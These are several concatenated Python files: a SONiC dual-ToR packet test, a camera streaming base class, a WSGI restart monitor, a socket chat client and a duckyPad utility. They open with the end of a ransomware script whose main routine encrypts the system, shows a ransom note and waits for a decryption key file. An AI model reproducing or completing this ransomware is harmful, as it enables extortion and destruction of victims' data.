with open(f'{self.sysRoot}/Desktop/PUT_ME_ON_DESKTOP.txt', 'r') as f:
self.key = f.read()
self.crypter = Fernet(self.key)
# Decrpyt system once have file is found and we have cryptor with the correct key
self.crypt_system(encrypted=True)
print('decrypted') # Debugging/Testing
break
except Exception as e:
print(e) # Debugging/Testing
pass
time.sleep(10) # Debugging/Testing check for file on desktop ever 10 seconds
print('Checking for PUT_ME_ON_DESKTOP.txt') # Debugging/Testing
# Would use below code in real life etc... above 10secs is just to "show" concept
# Sleep ~ 3 mins
# secs = 60
# mins = 3
# time.sleep((mins*secs))
def main():
# testfile = r'D:\Coding\Python\RansomWare\RansomWare_Software\testfile.png'
rw = RansomWare()
rw.generate_key()
rw.crypt_system()
rw.write_key()
rw.encrypt_fernet_key()
rw.change_desktop_background()
rw.what_is_bitcoin()
rw.ransom_note()
t1 = threading.Thread(target=rw.show_ransom_note)
t2 = threading.Thread(target=rw.put_me_on_desktop)
t1.start()
print('> RansomWare: Attack completed on target machine and system is encrypted') # Debugging/Testing
print('> RansomWare: Waiting for attacker to give target machine document that will un-encrypt machine') # Debugging/Testing
t2.start()
print('> RansomWare: Target machine has been un-encrypted') # Debugging/Testing
print('> RansomWare: Completed') # Debugging/Testing
if __name__ == '__main__':
main()
|
dual_tor_io.py
|
import datetime
import threading
import time
import socket
import random
import struct
import ipaddress
import logging
import json
import scapy.all as scapyall
import ptf.testutils as testutils
from operator import itemgetter
from itertools import groupby
from tests.common.utilities import InterruptableThread
from natsort import natsorted
from collections import defaultdict
TCP_DST_PORT = 5000
SOCKET_RECV_BUFFER_SIZE = 10 * 1024 * 1024
PTFRUNNER_QLEN = 1000
VLAN_INDEX = 0
VLAN_HOSTS = 100
VLAN_BASE_MAC_PATTERN = "72060001{:04}"
LAG_BASE_MAC_PATTERN = '5c010203{:04}'
logger = logging.getLogger(__name__)
class DualTorIO:
def __init__(self, activehost, standbyhost, ptfhost, ptfadapter, tbinfo,
io_ready, tor_vlan_port=None, send_interval=0.01):
self.tor_pc_intf = None
self.tor_vlan_intf = tor_vlan_port
self.duthost = activehost
self.ptfadapter = ptfadapter
self.ptfhost = ptfhost
self.tbinfo = tbinfo
self.io_ready_event = io_ready
self.dut_mac = self.duthost.facts["router_mac"]
self.active_mac = self.dut_mac
self.standby_mac = standbyhost.facts["router_mac"]
self.dataplane = self.ptfadapter.dataplane
self.dataplane.flush()
self.test_results = dict()
self.stop_early = False
self.ptf_sniffer = "/root/dual_tor_sniffer.py"
# Calculate valid range for T1 src/dst addresses
mg_facts = self.duthost.get_extended_minigraph_facts(self.tbinfo)
prefix_len = mg_facts['minigraph_vlan_interfaces'][VLAN_INDEX]['prefixlen'] - 3
test_network = ipaddress.ip_address(
mg_facts['minigraph_vlan_interfaces'][VLAN_INDEX]['addr']) +\
(1 << (32 - prefix_len))
self.default_ip_range = str(ipaddress.ip_interface(unicode(
str(test_network) + '/{0}'.format(prefix_len))).network)
self.src_addr, mask = self.default_ip_range.split('/')
self.n_hosts = 2**(32 - int(mask))
self.tor_to_ptf_intf_map = mg_facts['minigraph_ptf_indices']
portchannel_info = mg_facts['minigraph_portchannels']
self.tor_pc_intfs = list()
for pc in portchannel_info.values():
for member in pc['members']:
self.tor_pc_intfs.append(member)
self.vlan_interfaces = mg_facts["minigraph_vlans"].values()[VLAN_INDEX]["members"]
config_facts = self.duthost.get_running_config_facts()
vlan_table = config_facts['VLAN']
vlan_name = list(vlan_table.keys())[0]
self.vlan_mac = vlan_table[vlan_name]['mac']
self.mux_cable_table = config_facts['MUX_CABLE']
self.ptf_intf_to_server_ip_map = self._generate_vlan_servers()
self.__configure_arp_responder()
logger.info("VLAN interfaces: {}".format(str(self.vlan_interfaces)))
logger.info("PORTCHANNEL interfaces: {}".format(str(self.tor_pc_intfs)))
self.time_to_listen = 300.0
self.sniff_time_incr = 0
# Inter-packet send-interval (minimum interval 3.5ms)
if send_interval < 0.0035:
if send_interval is not None:
logger.warn("Minimum packet send-interval is .0035s. \
Ignoring user-provided interval {}".format(send_interval))
self.send_interval = 0.0035
else:
self.send_interval = send_interval
# How many packets to be sent by sender thread
logger.info("Using send interval {}".format(self.send_interval))
self.packets_to_send = min(int(self.time_to_listen /
(self.send_interval * 2)), 45000)
self.packets_sent_per_server = dict()
if self.tor_vlan_intf:
self.packets_per_server = self.packets_to_send
else:
self.packets_per_server = self.packets_to_send // len(self.vlan_interfaces)
self.all_packets = []
def _generate_vlan_servers(self):
"""
Create mapping of server IPs to PTF interfaces
"""
server_ip_list = []
for _, config in natsorted(self.mux_cable_table.items()):
server_ip_list.append(str(config['server_ipv4'].split("/")[0]))
logger.info("ALL server address:\n {}".format(server_ip_list))
ptf_to_server_map = dict()
for i, vlan_intf in enumerate(natsorted(self.vlan_interfaces)):
ptf_intf = self.tor_to_ptf_intf_map[vlan_intf]
addr = server_ip_list[i]
ptf_to_server_map[ptf_intf] = [str(addr)]
logger.debug('VLAN intf to server IP map: {}'.format(json.dumps(ptf_to_server_map, indent=4, sort_keys=True)))
return ptf_to_server_map
def __configure_arp_responder(self):
"""
@summary: Generate ARP responder configuration using vlan_host_map.
Copy this configuration to PTF and restart arp_responder
"""
arp_responder_conf = {}
for intf, ip in self.ptf_intf_to_server_ip_map.items():
arp_responder_conf['eth{}'.format(intf)] = ip
with open("/tmp/from_t1.json", "w") as fp:
json.dump(arp_responder_conf, fp, indent=4, sort_keys=True)
self.ptfhost.copy(src="/tmp/from_t1.json", dest="/tmp/from_t1.json")
self.ptfhost.shell("supervisorctl reread && supervisorctl update")
self.ptfhost.shell("supervisorctl restart arp_responder")
logger.info("arp_responder restarted")
def start_io_test(self, traffic_generator=None):
"""
@summary: The entry point to start the TOR dataplane I/O test.
Args:
traffic_generator (function): A callback function to decide the
traffic direction (T1 to server / server to T1)
Allowed values: self.generate_from_t1_to_server or
self.generate_from_server_to_t1
"""
# Check in a conditional for better readability
self.traffic_generator = traffic_generator
if self.traffic_generator == self.generate_from_t1_to_server:
self.generate_from_t1_to_server()
elif self.traffic_generator == self.generate_from_server_to_t1:
self.generate_from_server_to_t1()
else:
logger.error("Traffic generator not provided or invalid")
return
# start and later join the sender and sniffer threads
self.send_and_sniff(sender=self.traffic_sender_thread,
sniffer=self.traffic_sniffer_thread)
def generate_from_t1_to_server(self):
"""
@summary: Generate (not send) the packets to be sent from T1 to server
"""
logger.info("Generating T1 to server packets")
eth_dst = self.dut_mac
ip_ttl = 255
if self.tor_pc_intf and self.tor_pc_intf in self.tor_pc_intfs:
# If a source portchannel intf is specified,
# get the corresponding PTF info
ptf_t1_src_intf = self.tor_to_ptf_intf_map[self.tor_pc_intf]
eth_src = self.ptfadapter.dataplane.get_mac(0, ptf_t1_src_intf)
random_source = False
else:
# If no source portchannel specified, randomly choose one
# during packet generation
logger.info('Using random T1 source intf')
ptf_t1_src_intf = None
eth_src = None
random_source = True
if self.tor_vlan_intf:
# If destination VLAN intf is specified,
# use only the connected server
ptf_port = self.tor_to_ptf_intf_map[self.tor_vlan_intf]
server_ip_list = [
self.ptf_intf_to_server_ip_map[ptf_port]
]
else:
# Otherwise send packets to all servers
server_ip_list = self.ptf_intf_to_server_ip_map.values()
logger.info("-"*20 + "T1 to server packet" + "-"*20)
logger.info("PTF source intf: {}"
.format('random' if random_source else ptf_t1_src_intf)
)
logger.info("Ethernet address: dst: {} src: {}"
.format(eth_dst, 'random' if random_source else eth_src)
)
logger.info("IP address: dst: {} src: random"
.format('all' if len(server_ip_list) > 1
else server_ip_list[0]
)
)
logger.info("TCP port: dst: {}".format(TCP_DST_PORT))
logger.info("DUT mac: {}".format(self.dut_mac))
logger.info("VLAN mac: {}".format(self.vlan_mac))
logger.info("-"*50)
self.packets_list = []
# Create packet #1 for each server and append to the list,
# then packet #2 for each server, etc.
# This way, when sending packets we continuously send for all servers
# instead of sending all packets for server #1, then all packets for
# server #2, etc.
tcp_tx_packet_orig = testutils.simple_tcp_packet(
eth_dst=eth_dst,
eth_src=eth_src,
ip_ttl=ip_ttl,
tcp_dport=TCP_DST_PORT
)
tcp_tx_packet_orig = scapyall.Ether(str(tcp_tx_packet_orig))
payload_suffix = "X" * 60
for i in range(self.packets_per_server):
for server_ip in server_ip_list:
packet = tcp_tx_packet_orig.copy()
if random_source:
tor_pc_src_intf = random.choice(
self.tor_pc_intfs
)
ptf_t1_src_intf = self.tor_to_ptf_intf_map[tor_pc_src_intf]
eth_src = self.ptfadapter.dataplane.get_mac(
0, ptf_t1_src_intf
)
packet[scapyall.Ether].src = eth_src
packet[scapyall.IP].src = self.random_host_ip()
packet[scapyall.IP].dst = server_ip
payload = str(i) + payload_suffix
packet.load = payload
packet[scapyall.TCP].chksum = None
packet[scapyall.IP].chksum = None
self.packets_list.append((ptf_t1_src_intf, str(packet)))
self.sent_pkt_dst_mac = self.dut_mac
self.received_pkt_src_mac = [self.vlan_mac]
def generate_from_server_to_t1(self):
"""
@summary: Generate (not send) the packets to be sent from server to T1
"""
logger.info("Generating server to T1 packets")
if self.tor_vlan_intf:
vlan_src_intfs = [self.tor_vlan_intf]
# If destination VLAN intf is specified,
# use only the connected server
else:
# Otherwise send packets to all servers
vlan_src_intfs = self.vlan_interfaces
ptf_intf_to_mac_map = {}
for ptf_intf in self.ptf_intf_to_server_ip_map.keys():
ptf_intf_to_mac_map[ptf_intf] = self.ptfadapter.dataplane.get_mac(0, ptf_intf)
logger.info("-"*20 + "Server to T1 packet" + "-"*20)
if self.tor_vlan_intf is None:
src_mac = 'random'
src_ip = 'random'
else:
ptf_port = self.tor_to_ptf_intf_map[self.tor_vlan_intf]
src_mac = ptf_intf_to_mac_map[ptf_port]
src_ip = self.ptf_intf_to_server_ip_map[ptf_port]
logger.info(
"Ethernet address: dst: {} src: {}".format(
self.vlan_mac, src_mac
)
)
logger.info(
"IP address: dst: {} src: {}".format(
'random', src_ip
)
)
logger.info("TCP port: dst: {} src: 1234".format(TCP_DST_PORT))
logger.info("Active ToR MAC: {}, Standby ToR MAC: {}".format(self.active_mac,
self.standby_mac))
logger.info("VLAN MAC: {}".format(self.vlan_mac))
logger.info("-"*50)
self.packets_list = []
# Create packet #1 for each server and append to the list,
# then packet #2 for each server, etc.
# This way, when sending packets we continuously send for all servers
# instead of sending all packets for server #1, then all packets for
# server #2, etc.
tcp_tx_packet_orig = testutils.simple_tcp_packet(
eth_dst=self.vlan_mac,
tcp_dport=TCP_DST_PORT
)
tcp_tx_packet_orig = scapyall.Ether(str(tcp_tx_packet_orig))
payload_suffix = "X" * 60
for i in range(self.packets_per_server):
for vlan_intf in vlan_src_intfs:
ptf_src_intf = self.tor_to_ptf_intf_map[vlan_intf]
server_ip = self.ptf_intf_to_server_ip_map[ptf_src_intf]
eth_src = ptf_intf_to_mac_map[ptf_src_intf]
payload = str(i) + payload_suffix
packet = tcp_tx_packet_orig.copy()
packet[scapyall.Ether].src = eth_src
packet[scapyall.IP].src = server_ip
packet[scapyall.IP].dst = self.random_host_ip()
packet.load = payload
packet[scapyall.TCP].chksum = None
packet[scapyall.IP].chksum = None
self.packets_list.append((ptf_src_intf, str(packet)))
self.sent_pkt_dst_mac = self.vlan_mac
self.received_pkt_src_mac = [self.active_mac, self.standby_mac]
def random_host_ip(self):
"""
@summary: Helper method to find a random host IP for generating a random src/dst IP address
Returns:
host_ip (str): Random IP address
"""
host_number = random.randint(2, self.n_hosts - 2)
if host_number > (self.n_hosts - 2):
raise Exception("host number {} is greater than number of hosts {}\
in the network {}".format(
host_number, self.n_hosts - 2, self.default_ip_range))
src_addr_n = struct.unpack(">I", socket.inet_aton(self.src_addr))[0]
net_addr_n = src_addr_n & (2**32 - self.n_hosts)
host_addr_n = net_addr_n + host_number
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
return host_ip
def send_and_sniff(self, sender, sniffer):
"""
@summary: This method starts and joins two background threads in parallel: sender and sniffer
"""
self.sender_thr = InterruptableThread(target=sender)
self.sniff_thr = InterruptableThread(target=sniffer)
self.sniffer_started = threading.Event()
self.sniff_thr.set_error_handler(lambda *args, **kargs: self.sniffer_started.set())
self.sender_thr.set_error_handler(lambda *args, **kargs: self.io_ready_event.set())
self.sniff_thr.start()
self.sender_thr.start()
self.sender_thr.join()
self.sniff_thr.join()
def traffic_sender_thread(self):
"""
@summary: Generalized Sender thread (to be used for traffic in both directions)
Waits for a signal from the `traffic_sniffer_thread` before actually starting.
        This is to make sure that packets are not sent before the sniffer is ready to capture them.
"""
logger.info("Sender waiting to send {} packets".format(len(self.packets_list)))
self.sniffer_started.wait(timeout=10)
sender_start = datetime.datetime.now()
logger.info("Sender started at {}".format(str(sender_start)))
# Signal data_plane_utils that sender and sniffer threads have begun
self.io_ready_event.set()
sent_packets_count = 0
for entry in self.packets_list:
_, packet = entry
server_addr = self.get_server_address(scapyall.Ether(str(packet)))
time.sleep(self.send_interval)
# the stop_early flag can be set to True by data_plane_utils to stop prematurely
if self.stop_early:
break
testutils.send_packet(self.ptfadapter, *entry)
self.packets_sent_per_server[server_addr] =\
self.packets_sent_per_server.get(server_addr, 0) + 1
sent_packets_count = sent_packets_count + 1
time.sleep(10)
self.stop_sniffer_early()
logger.info("Stop the sender thread gracefully after sending {} packets"\
.format(sent_packets_count))
logger.info("Sender finished running after {}".format(
str(datetime.datetime.now() - sender_start)))
def stop_sniffer_early(self):
# Try to stop sniffer earlier by sending SIGINT signal to the sniffer process
# Python installs a small number of signal handlers by default.
# SIGINT is translated into a KeyboardInterrupt exception.
logger.info("Stop the sniffer thread gracefully: sending SIGINT to ptf process")
self.ptfhost.command("pkill -SIGINT -f {}".format(self.ptf_sniffer),\
module_ignore_errors=True)
def get_server_address(self, packet):
if self.traffic_generator == self.generate_from_t1_to_server:
server_addr = packet[scapyall.IP].dst
elif self.traffic_generator == self.generate_from_server_to_t1:
server_addr = packet[scapyall.IP].src
return server_addr
def traffic_sniffer_thread(self):
"""
@summary: Generalized sniffer thread (to be used for traffic in both directions)
Starts `scapy_sniff` thread, and waits for its setup before
signalling the sender thread to start
"""
wait = self.time_to_listen + self.sniff_time_incr
sniffer_start = datetime.datetime.now()
logger.info("Sniffer started at {}".format(str(sniffer_start)))
sniff_filter = "tcp and tcp dst port {} and tcp src port 1234 and not icmp".\
format(TCP_DST_PORT)
# We run a PTF script on PTF to sniff traffic. The PTF script calls
# scapy.sniff which by default capture the backplane interface for
# announcing routes from PTF to VMs. On VMs, the PTF backplane is the
        # next hop for the announced routes. So, packets sent by DUT to VMs
# are forwarded to the PTF backplane interface as well. Then on PTF,
# the packets sent by DUT to VMs can be captured on both the PTF interfaces
# tapped to VMs and on the backplane interface. This will result in
# packet duplication and fail the test. Below change is to add capture
# filter to filter out all the packets destined to the PTF backplane interface.
output = self.ptfhost.shell('cat /sys/class/net/backplane/address',\
module_ignore_errors=True)
if not output['failed']:
ptf_bp_mac = output['stdout']
sniff_filter = '({}) and (not ether dst {})'.format(sniff_filter, ptf_bp_mac)
scapy_sniffer = InterruptableThread(
target=self.scapy_sniff,
kwargs={
'sniff_timeout': wait,
'sniff_filter': sniff_filter
}
)
scapy_sniffer.start()
time.sleep(10) # Let the scapy sniff initialize completely.
self.sniffer_started.set() # Unblock waiter for the send_in_background.
scapy_sniffer.join()
logger.info("Sniffer finished running after {}".\
format(str(datetime.datetime.now() - sniffer_start)))
self.sniffer_started.clear()
def scapy_sniff(self, sniff_timeout=180, sniff_filter=''):
"""
@summary: PTF runner - runs a sniffer in PTF container.
Running sniffer in sonic-mgmt container has missing SOCKET problem
and permission issues (scapy and tcpdump require root user)
The remote function listens on all intfs. Once found, all packets
are dumped to local pcap file, and all packets are saved to
self.all_packets as scapy type.
Args:
sniff_timeout (int): Duration in seconds to sniff the traffic
sniff_filter (str): Filter that Scapy will use to collect only relevant packets
"""
capture_pcap = '/tmp/capture.pcap'
capture_log = '/tmp/capture.log'
self.ptfhost.copy(src='scripts/dual_tor_sniffer.py', dest=self.ptf_sniffer)
self.ptfhost.command(
'python {} -f "{}" -p {} -l {} -t {}'.format(
self.ptf_sniffer, sniff_filter, capture_pcap, capture_log, sniff_timeout
)
)
logger.info('Fetching pcap file from ptf')
self.ptfhost.fetch(src=capture_pcap, dest='/tmp/', flat=True, fail_on_missing=False)
self.all_packets = scapyall.rdpcap(capture_pcap)
logger.info("Number of all packets captured: {}".format(len(self.all_packets)))
def get_test_results(self):
return self.test_results
def examine_flow(self):
"""
@summary: This method examines packets collected by sniffer thread
The method compares TCP payloads of the packets one by one (assuming all
payloads are consecutive integers), and the losses if found - are treated
as disruptions in Dataplane forwarding. All disruptions are saved to
self.lost_packets dictionary, in format:
disrupt_start_id = (missing_packets_count, disrupt_time,
disrupt_start_timestamp, disrupt_stop_timestamp)
"""
examine_start = datetime.datetime.now()
logger.info("Packet flow examine started {}".format(str(examine_start)))
if not self.all_packets:
logger.error("self.all_packets not defined.")
return None
# Filter out packets:
filtered_packets = [ pkt for pkt in self.all_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == TCP_DST_PORT and
self.check_tcp_payload(pkt) and
(
pkt[scapyall.Ether].dst == self.sent_pkt_dst_mac or
pkt[scapyall.Ether].src in self.received_pkt_src_mac
)
]
logger.info("Number of filtered packets captured: {}".format(len(filtered_packets)))
if not filtered_packets or len(filtered_packets) == 0:
logger.error("Sniffer failed to capture any traffic")
return
server_to_packet_map = defaultdict(list)
# Split packets into separate lists based on server IP
for packet in filtered_packets:
server_addr = self.get_server_address(packet)
server_to_packet_map[server_addr].append(packet)
# For each server's packet list, sort by payload then timestamp
# (in case of duplicates)
for server in server_to_packet_map.keys():
server_to_packet_map[server].sort(
key=lambda packet: (int(str(packet[scapyall.TCP].payload)
.replace('X','')),
packet.time)
)
logger.info("Measuring traffic disruptions...")
for server_ip, packet_list in server_to_packet_map.items():
filename = '/tmp/capture_filtered_{}.pcap'.format(server_ip)
scapyall.wrpcap(filename, packet_list)
logger.info("Filtered pcap dumped to {}".format(filename))
self.test_results = {}
for server_ip in natsorted(server_to_packet_map.keys()):
result = self.examine_each_packet(server_ip, server_to_packet_map[server_ip])
logger.info("Server {} results:\n{}"
.format(server_ip, json.dumps(result, indent=4)))
self.test_results[server_ip] = result
def examine_each_packet(self, server_ip, packets):
num_sent_packets = 0
received_packet_list = list()
duplicate_packet_list = list()
disruption_ranges = list()
disruption_before_traffic = False
disruption_after_traffic = False
duplicate_ranges = []
for packet in packets:
if packet[scapyall.Ether].dst == self.sent_pkt_dst_mac:
# This is a sent packet
num_sent_packets += 1
continue
if packet[scapyall.Ether].src in self.received_pkt_src_mac:
# This is a received packet.
                # scapy 2.4.5 will use Decimal to calculate time, but json.dumps
# can't recognize Decimal, transform to float here
curr_time = float(packet.time)
curr_payload = int(str(packet[scapyall.TCP].payload).replace('X',''))
# Look back at the previous received packet to check for gaps/duplicates
# Only if we've already received some packets
if len(received_packet_list) > 0:
prev_payload, prev_time = received_packet_list[-1]
if prev_payload == curr_payload:
# Duplicate packet detected, increment the counter
duplicate_packet_list.append((curr_payload, curr_time))
if prev_payload + 1 < curr_payload:
# Non-sequential packets indicate a disruption
disruption_dict = {
'start_time': prev_time,
'end_time': curr_time,
'start_id': prev_payload,
'end_id': curr_payload
}
disruption_ranges.append(disruption_dict)
# Save packets as (payload_id, timestamp) tuples
# for easier timing calculations later
received_packet_list.append((curr_payload, curr_time))
if len(received_packet_list) == 0:
logger.error("Sniffer failed to filter any traffic from DUT")
else:
# Find ranges of consecutive packets that have been duplicated
# All packets within the same consecutive range will have the same
# difference between the packet index and the sequence number
for _, grouper in groupby(enumerate(duplicate_packet_list), lambda (i,x): i - x[0]):
group = map(itemgetter(1), grouper)
duplicate_start, duplicate_end = group[0], group[-1]
duplicate_dict = {
'start_time': duplicate_start[1],
'end_time': duplicate_end[1],
'start_id': duplicate_start[0],
'end_id': duplicate_end[0]
}
duplicate_ranges.append(duplicate_dict)
# If the first packet we received is not #0, some disruption started
# before traffic started. Store the id of the first received packet
if received_packet_list[0][0] != 0:
disruption_before_traffic = received_packet_list[0][0]
# If the last packet we received does not match the number of packets
# sent, some disruption continued after the traffic finished.
# Store the id of the last received packet
if received_packet_list[-1][0] != self.packets_sent_per_server.get(server_ip) - 1:
disruption_after_traffic = received_packet_list[-1][0]
result = {
'sent_packets': num_sent_packets,
'received_packets': len(received_packet_list),
'disruption_before_traffic': disruption_before_traffic,
'disruption_after_traffic': disruption_after_traffic,
'duplications': duplicate_ranges,
'disruptions': disruption_ranges
}
        if num_sent_packets < self.packets_sent_per_server.get(server_ip):
            logger.error('Not all sent packets were captured. '
                         'Something went wrong!')
            logger.error('Dumping server {} results and continuing:\n{}'
                         .format(server_ip, json.dumps(result, indent=4)))
return result
def check_tcp_payload(self, packet):
"""
@summary: Helper method
Returns: Bool: True if a packet is not corrupted and has a valid TCP
sequential TCP Payload
"""
try:
int(str(packet[scapyall.TCP].payload).replace('X','')) in range(
self.packets_to_send)
return True
except Exception as err:
return False
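

# Illustrative standalone sketch (an addition, not part of the original test):
# the gap/duplicate detection performed in examine_each_packet() reduces to
# comparing each received payload id with the previous one, as below.
def _find_gaps_and_duplicates(received):
    """received: list of (payload_id, timestamp) tuples sorted by payload id."""
    gaps, duplicates = [], []
    for (prev_id, prev_time), (curr_id, curr_time) in zip(received, received[1:]):
        if curr_id == prev_id:
            # same payload seen twice: a duplicated packet
            duplicates.append((curr_id, curr_time))
        elif curr_id > prev_id + 1:
            # a jump in payload ids marks a forwarding disruption
            gaps.append({'start_id': prev_id, 'end_id': curr_id,
                         'start_time': prev_time, 'end_time': curr_time})
    return gaps, duplicates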
|
base_camera.py
|
import time
import threading
import cv2
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
            # if no clients have asked for frames in the last
            # 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
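# The sketch below is not part of the original module; it only illustrates how
# a subclass is expected to override frames(). It assumes a local webcam that
# can be read through cv2.VideoCapture (cv2 is already imported above); the
# device index 0 and JPEG encoding are illustrative choices.
class ExampleOpenCVCamera(BaseCamera):
    @staticmethod
    def frames():
        camera = cv2.VideoCapture(0)
        if not camera.isOpened():
            raise RuntimeError('Could not start camera.')
        try:
            while True:
                ok, img = camera.read()
                if not ok:
                    break
                # encode the raw frame as JPEG bytes for streaming clients
                yield cv2.imencode('.jpg', img)[1].tobytes()
        finally:
            camera.release()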
|
wsgi_restart.py
|
# This code lifted from the mod_wsgi docs.
import os
from pathlib import Path
from typing import Sequence
import sys
import signal
import threading
import atexit
import queue
_interval = 1.0
_times = {}
_files = [] # type: Sequence[Path]
_running = False
_queue = queue.Queue() # type: queue.Queue
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Change detected to \'%s\'.' % (prefix, path), file=sys.stderr)
print('%s Triggering process restart.' % prefix, file=sys.stderr)
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
        # If the path doesn't denote a file and we were previously
        # tracking it, then it has been removed or the file type has
        # changed, so force a restart. If we weren't previously
        # tracking the file, we can ignore it: it is probably a
        # pseudo reference, such as a file extracted from a
        # collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
except Exception:
        # If any exception occurred, it is likely that the file was
        # removed just before stat(), so force a restart.
return True
return False
def _monitor():
while True:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except Exception:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except Exception:
pass
_thread.join()
atexit.register(_exiting)
def track(path):
if path not in _files:
_files.append(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Starting change monitor.' % prefix, file=sys.stderr)
        _running = True
        _thread.start()
    _lock.release()
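# Usage sketch (not part of the lifted mod_wsgi snippet above): in the WSGI
# script file, import this module, optionally register extra files to watch,
# and start the monitor once. The paths below are placeholders.
#
#   import wsgi_restart
#   wsgi_restart.track('/srv/app/local_settings.cfg')  # watch a non-module file
#   wsgi_restart.start(interval=1.0)                    # poll every second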
|
client-socket.py
|
import socket
import threading
# Choosing a nickname
nickname = input("Enter a nickname: ")
# Connecting the client to the server
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect((socket.gethostbyname(socket.gethostname()), 12458))
# Listening to the server and Sending the nickname
def receive():
while True:
try:
# Receive a message from the server (Not visible to user)
message = clientSocket.recv(1024).decode('ascii')
if message == 'NICK':
clientSocket.send(nickname.encode('ascii'))
else:
print('>' + message)
except:
# Close the connection if an error occurs
            print('An error occurred')
clientSocket.close()
break
# A function which helps in writing messages
def write():
while True:
message = '> {}: {}'.format(nickname, input(' '))
clientSocket.send(message.encode('ascii'))
# Starting Threads For Listening And Writing
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
duckypad_autoprofile.py
|
import time
from tkinter import *
from tkinter import filedialog
from tkinter import simpledialog
from tkinter import messagebox
import urllib.request
import tkinter.scrolledtext as ScrolledText
import traceback
import json
import os
import webbrowser
import sys
import threading
import logging
import hid_rw
import get_window
import check_update
from appdirs import *
import subprocess
def is_root():
return os.getuid() == 0
def ensure_dir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
# xhost +;sudo python3 duckypad_autoprofile.py
appname = 'duckypad_autoswitcher'
appauthor = 'dekuNukem'
save_path = user_data_dir(appname, appauthor, roaming=True)
ensure_dir(save_path)
save_filename = os.path.join(save_path, 'config.txt')
logging_filename = os.path.join(save_path, 'debug_log.txt')
logging.basicConfig(level=logging.INFO, filename=logging_filename, filemode='w', format='%(asctime)s %(filename)s %(levelname)s %(message)s')
default_button_color = 'SystemButtonFace'
if 'linux' in sys.platform:
default_button_color = 'grey'
THIS_VERSION_NUMBER = '0.0.7'
MAIN_WINDOW_WIDTH = 640
MAIN_WINDOW_HEIGHT = 660
PADDING = 10
fw_update_checked = False
logging.info("duckyPad autoswitcher started! V" + THIS_VERSION_NUMBER)
def duckypad_connect(show_box=True):
# print("def duckypad_connect():")
logging.info("def duckypad_connect():")
global fw_update_checked
if hid_rw.get_duckypad_path() is None:
connection_info_str.set("duckyPad not found")
connection_info_label.config(foreground='red')
logging.info("duckyPad not found")
return
init_success = True
try:
init_success = hid_rw.duckypad_init()
except Exception as e:
init_success = False
logging.error(traceback.format_exc())
if init_success is False:
connection_info_str.set("duckyPad detected but lacks permission")
connection_info_label.config(foreground='red')
if init_success is False and show_box is False:
return
if init_success is False and 'darwin' in sys.platform and is_root() is False:
if messagebox.askokcancel("Info", "duckyPad detected, but this app lacks permission to access it.\n\nClick OK to see instructions") is True:
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/troubleshooting.md#autoswitcher--usb-configuration-isnt-working-on-macos')
return
elif init_success is False and 'darwin' in sys.platform and is_root() is True:
if messagebox.askokcancel("Info", "duckyPad detected, however, due to macOS restrictions, you'll need to enable some privacy settings.\n\nClick OK to learn how.") is True:
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/troubleshooting.md#autoswitcher--usb-configuration-isnt-working-on-macos')
return
elif init_success is False and 'linux' in sys.platform:
